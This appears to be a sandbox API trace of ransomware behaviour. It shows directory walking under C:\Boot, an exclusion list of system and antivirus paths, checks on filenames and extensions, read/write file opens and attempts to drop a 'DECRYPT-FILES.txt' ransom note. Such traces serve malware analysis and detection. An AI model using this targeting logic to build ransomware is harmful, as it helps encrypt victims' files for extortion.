(lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.537] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.538] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.538] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.538] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.538] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.538] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.538] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.538] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0179.538] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.538] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0179.538] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\Boot\\en-US\\bootmgr.exe.mui" [0179.538] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.538] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.538] CloseHandle (hObject=0x0) returned 0 [0179.538] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.538] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.538] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.538] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0179.538] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="DECRYPT-FILES.txt") returned 1 [0179.538] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="autorun.inf") returned 1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="boot.ini") returned 1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="desktop.ini") returned 1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ntuser.dat") returned -1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="iconcache.db") returned 1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="bootsect.bak") returned 1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="thumbs.db") returned -1 [0179.539] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.539] lstrlenW (lpString="memtest.exe.mui") returned 15 [0179.539] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.539] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.539] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.539] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.539] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0179.539] lstrlenW (lpString="memtest.exe.mui") returned 15 [0179.539] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0179.539] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="memtest.exe.mui" | out: lpString1="C:\\Boot\\en-US\\memtest.exe.mui") returned="C:\\Boot\\en-US\\memtest.exe.mui" [0179.539] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.539] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.539] CloseHandle (hObject=0x0) returned 0 [0179.539] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.539] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0179.540] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.540] CloseHandle (hObject=0xffffffff) returned 0 [0179.540] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0179.540] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0179.540] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0179.540] lstrcatW (in: lpString1="es-ES", lpString2="\\" | out: lpString1="es-ES\\") returned="es-ES\\" [0179.540] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="es-ES\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Program Files") returned 0x0 [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch=":\\Windows") returned 0x0 [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Games\\") returned 0x0 [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.540] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\All Users") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="AhnLab") returned 0x0 [0179.541] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.541] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0179.541] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.541] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\es-ES\\\\0a16c9.tmp") returned 25 [0179.541] CreateFileW (lpFileName="C:\\Boot\\es-ES\\\\0a16c9.tmp" (normalized: "c:\\boot\\es-es\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.543] GetLastError () returned 0x5 [0179.543] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0179.543] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.543] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\es-ES\\\\DECRYPT-FILES.txt") returned 32 [0179.543] CreateFileW (lpFileName="C:\\Boot\\es-ES\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\es-es\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.580] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0179.580] lstrcatW (in: lpString1="C:\\Boot\\es-ES\\", lpString2="*" | out: lpString1="C:\\Boot\\es-ES\\*") returned="C:\\Boot\\es-ES\\*" [0179.580] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.581] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.581] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.581] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.581] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.581] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.581] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.581] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.581] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.581] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.581] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.581] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.581] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0179.581] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.581] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\es-ES\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0179.581] lstrcatW (in: lpString1="C:\\Boot\\es-ES\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\Boot\\es-ES\\bootmgr.exe.mui" [0179.581] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.582] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.582] CloseHandle (hObject=0x0) returned 0 [0179.582] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.582] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.582] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.582] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.582] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.582] CloseHandle (hObject=0xffffffff) returned 0 [0179.582] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0179.582] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0179.582] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0179.582] lstrcatW (in: lpString1="fi-FI", lpString2="\\" | out: lpString1="fi-FI\\") returned="fi-FI\\" [0179.582] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fi-FI\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Program Files") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch=":\\Windows") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Games\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\All Users") returned 0x0 [0179.582] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.583] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.583] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.583] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="AhnLab") returned 0x0 [0179.583] StrStrW (lpFirst="C:\\Boot\\fi-FI\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.583] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0179.583] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.583] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\fi-FI\\\\0a16c9.tmp") returned 25 [0179.583] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\\\0a16c9.tmp" (normalized: "c:\\boot\\fi-fi\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.583] GetLastError () returned 0x5 [0179.583] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0179.583] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.583] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\fi-FI\\\\DECRYPT-FILES.txt") returned 32 [0179.583] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\fi-fi\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.584] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0179.585] lstrcatW (in: lpString1="C:\\Boot\\fi-FI\\", lpString2="*" | out: lpString1="C:\\Boot\\fi-FI\\*") returned="C:\\Boot\\fi-FI\\*" [0179.585] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.585] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.585] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.585] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.585] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.585] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.585] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.585] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.585] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.585] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.585] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.585] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.585] lstrlenW (lpString="C:\\Boot\\fi-FI\\") returned 14 [0179.585] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.585] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\fi-FI\\" | out: lpString1="C:\\Boot\\fi-FI\\") returned="C:\\Boot\\fi-FI\\" [0179.585] lstrcatW (in: lpString1="C:\\Boot\\fi-FI\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned="C:\\Boot\\fi-FI\\bootmgr.exe.mui" [0179.585] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.586] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.586] CloseHandle (hObject=0x0) returned 0 [0179.586] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.586] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.586] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.586] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6aeb4c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.586] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.586] CloseHandle (hObject=0xffffffff) returned 0 [0179.586] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6aeb4c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0179.586] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0179.586] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0179.586] lstrcatW (in: lpString1="Fonts", lpString2="\\" | out: lpString1="Fonts\\") returned="Fonts\\" [0179.586] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="Fonts\\" | out: lpString1="C:\\Boot\\Fonts\\") returned="C:\\Boot\\Fonts\\" [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Program Files") returned 0x0 [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch=":\\Windows") returned 0x0 [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Games\\") returned 0x0 [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.586] StrStrW (lpFirst="C:\\Boot\\Fonts\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.586] 